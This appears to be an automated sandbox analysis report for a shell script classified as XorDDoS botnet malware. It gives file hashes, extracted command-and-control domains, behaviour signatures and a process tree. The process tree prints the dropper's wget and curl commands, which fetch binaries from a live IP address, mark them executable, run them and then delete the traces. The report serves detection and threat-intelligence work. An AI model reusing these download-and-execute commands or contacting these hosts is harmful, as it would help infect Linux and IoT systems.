Analysis

  • max time kernel
    75s
  • max time network
    86s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhf, image:debian9-armhf-20240611-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
  • submitted
    22-12-2024 07:56

General

  • Target

    112.sh

  • Size

    318B

  • MD5

    0368897400a135549c0a2d9d83d384cc

  • SHA1

    29c933b2a8dd201b4aaea73789664dda02c2fe75

  • SHA256

    ec991cf6eac0354077622d016f3408b35372c4bbb44e86bc250bc1fcbafedfc4

  • SHA512

    00216c30c5ab73b63821846febd159ac0be3c5a6658921ce9753c858ff2f83d698518c67283a9b2bea9da6067698b1302b6d84bf65ada476aba60bc35eedd758

Malware Config

Extracted

Family

xorddos

C2

api.markerbio.com:112

api.enoan2107.com:112

http://qq.com/lib.asp

Attributes

  • crc_polynomial

    CDB88320

  • xor.plain

Signatures

  • XorDDoS

    Botnet and downloader malware targeting Linux-based operating systems and IoT devices.

  • XorDDoS payload 1 IoCs
  • Xorddos family
  • File and Directory Permissions Modification 1 TTPs 2 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 2 IoCs
  • Checks CPU configuration 1 TTPs 2 IoCs

    Checks CPU information which indicates whether the system is a virtual machine.

  • Reads runtime system information 4 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 4 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/112.sh
    /tmp/112.sh
    1⤵
      PID:646
      • /usr/bin/wget
        wget http://43.249.172.195:888/112
        2⤵
        • Writes file to tmp directory
        PID:647
      • /usr/bin/curl
        curl -O http://43.249.172.195:888/112
        2⤵
        • Checks CPU configuration
        • Reads runtime system information
        • Writes file to tmp directory
        PID:753
      • /bin/chmod
        chmod +x 112
        2⤵
        • File and Directory Permissions Modification
        PID:761
      • /tmp/112
        ./112
        2⤵
        • Executes dropped EXE
        PID:762
      • /usr/bin/wget
        wget http://43.249.172.195:888/112s
        2⤵
        • Writes file to tmp directory
        PID:764
      • /usr/bin/curl
        curl -O http://43.249.172.195:888/112s
        2⤵
        • Checks CPU configuration
        • Reads runtime system information
        • Writes file to tmp directory
        PID:768
      • /bin/chmod
        chmod +x 112s
        2⤵
        • File and Directory Permissions Modification
        PID:773
      • /tmp/112s
        ./112s
        2⤵
        • Executes dropped EXE
        PID:774
      • /bin/rm
        rm -rf 112.sh
        2⤵
        PID:776
      • /bin/rm
        rm -rf 112
        2⤵
        PID:777
      • /bin/rm
        rm -rf 112s
        2⤵
        PID:778

Network

MITRE ATT&CK Enterprise v15

Downloads

  • /tmp/112

    Filesize

    549KB

    MD5

    f9191bab1e834d4aef3380700639cee9

    SHA1

    9c20269df6694260a24ac783de2e30d627a6928a

    SHA256

    ea40ecec0b30982fbb1662e67f97f0e9d6f43d2d587f2f588525fae683abea73

    SHA512

    3d2758fe2d06183e627b5cc24919c08c84108f2efd7ab0a162029d55537476410d9535d50f3eb059f7153f7482c134284862eea121201f82838aace4b12283b5